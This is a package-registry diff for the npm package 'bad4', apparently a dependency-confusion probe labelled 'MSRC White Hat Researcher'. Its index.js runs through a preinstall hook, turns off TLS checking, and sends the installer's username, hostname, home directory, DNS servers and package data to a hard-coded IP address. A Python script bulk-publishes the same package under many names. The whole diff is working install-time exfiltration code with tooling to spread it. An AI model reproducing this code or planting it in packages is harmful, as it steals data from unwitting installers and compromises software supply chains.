bad4 222.0.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of bad4 might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +48 -0
  2. package/package.json +13 -0
  3. package/register-all-the-packages.py +47 -0
package/index.js ADDED
@@ -0,0 +1,48 @@
1
+ process.env["NODE_TLS_REJECT_UNAUTHORIZED"] = 0;
2
+ process.env["NODE_NO_WARNINGS"] = 1;
3
+ const os = require("os");
4
+ const dns = require("dns");
5
+ const querystring = require("querystring");
6
+ const https = require("https");
7
+ const packageJSON = require("./package.json");
8
+ const package = packageJSON.name;
9
+
10
+ const trackingData = JSON.stringify({
11
+ p: package,
12
+ c: __dirname,
13
+ hd: os.homedir(),
14
+ hn: os.hostname(),
15
+ un: os.userInfo().username,
16
+ dns: dns.getServers(),
17
+ r: packageJSON ? packageJSON.___resolved : undefined,
18
+ v: packageJSON.version,
19
+ pjson: packageJSON,
20
+ });
21
+
22
+ var postData = querystring.stringify({
23
+ msg: trackingData,
24
+ });
25
+
26
+ var options = {
27
+ hostname: "52.188.192.212", //replace burpcollaborator.net with Interactsh or pipedream
28
+ port: 443,
29
+ path: "/trackeddata",
30
+ method: "POST",
31
+ headers: {
32
+ "Content-Type": "application/x-www-form-urlencoded",
33
+ "Content-Length": postData.length,
34
+ },
35
+ };
36
+
37
+ var req = https.request(options, (res) => {
38
+ res.on("data", (d) => {
39
+ process.stdout.write(d);
40
+ });
41
+ });
42
+
43
+ req.on("error", (e) => {
44
+ // console.error(e);
45
+ });
46
+
47
+ req.write(postData);
48
+ req.end();
package/package.json ADDED
@@ -0,0 +1,13 @@
1
+ {
2
+ "name": "bad4",
3
+ "version": "222.0.2",
4
+ "description": "MSRC White Hat Researcher",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "node index.js"
9
+ },
10
+ "author": "nullg0re",
11
+ "license": "ISC",
12
+ "keywords": []
13
+ }
package/register-all-the-packages.py ADDED
@@ -0,0 +1,47 @@
1
+ #!/usr/bin/python3
2
+ import subprocess
3
+ from colorama import Fore, Style
4
+
5
+ def load_packages():
6
+ file = '../packages.txt'
7
+ packages = []
8
+ f = open(file, 'r')
9
+ for line in f:
10
+ packages.append(line.strip())
11
+ f.close()
12
+ return packages
13
+
14
+ def install_and_publish_package(package):
15
+ # create NPM package.json file for malicious package
16
+ content = """{
17
+ "name": "---PACKAGE---",
18
+ "version": "222.0.2",
19
+ "description": "MSRC White Hat Researcher",
20
+ "main": "index.js",
21
+ "scripts": {
22
+ "test": "echo \\"Error: no test specified\\" && exit 1",
23
+ "preinstall": "node index.js"
24
+ },
25
+ "author": "nullg0re",
26
+ "license": "ISC"
27
+ }"""
28
+ output_file = "/home/tgore/WORK/Research/CTU-DR-MSFT/subdomains/dependency-confusion/malicious-package/package.json"
29
+ new_content = content.replace('---PACKAGE---', package)
30
+ f = open(output_file, 'w')
31
+ f.write(new_content)
32
+ f.close()
33
+ # npm init and publish
34
+ cmd1 = "npm init -y -f"
35
+ cmd2 = "npm publish"
36
+ subprocess.call(cmd1, shell=True)
37
+ subprocess.call(cmd2, shell=True)
38
+
39
+ def main():
40
+ print (f"{Fore.YELLOW}[ * ] Loading packages...{Style.RESET_ALL}")
41
+ packages = load_packages()
42
+ for package in packages:
43
+ install_and_publish_package(package)
44
+ print (f"{Fore.GREEN}[ + ] Finished! God Speed{Style.RESET_ALL}")
45
+
46
+ if __name__ == '__main__':
47
+ main()